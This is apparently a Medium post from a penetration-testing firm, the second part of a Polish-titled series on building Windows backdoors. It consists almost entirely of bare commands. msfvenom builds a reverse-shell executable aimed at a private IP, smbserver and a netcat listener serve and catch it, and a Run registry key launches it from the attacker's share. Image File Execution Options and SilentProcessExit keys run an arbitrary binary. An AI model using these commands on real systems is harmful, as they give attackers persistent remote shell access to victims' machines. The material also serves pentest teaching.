Windows — podstawy tworzenia backdoorów— część II

Klucze typu Run

msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.139.214 lport=8443 -f exe -o 8443.exe
smbserver.py -smb2support x .
nc -lvp 8443
reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run” /v WindowsSvc /d “cmd /c \\192.168.139.214\x\8443.exe” /t REG_SZ /f

Image File Execution Options

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe” /v Debugger /d notepad.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\binary.exe"

--

--

--

If you’re looking for the good guys who are ready and able to hack you, need look no further. We professionally find vulnerabilities before the bad guys do.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
AFINE

AFINE

If you’re looking for the good guys who are ready and able to hack you, need look no further. We professionally find vulnerabilities before the bad guys do.

More from Medium

Hacking the Tenda AC10–1200 Router Part 4: sscanf buffer overflow

CSG: Credential Storage for CTFs/Pentests

OhSINT — TryHackMe Walkthrough

WindowsXP default wallpaper

HTB: Cronos Writeup w/o Metasploit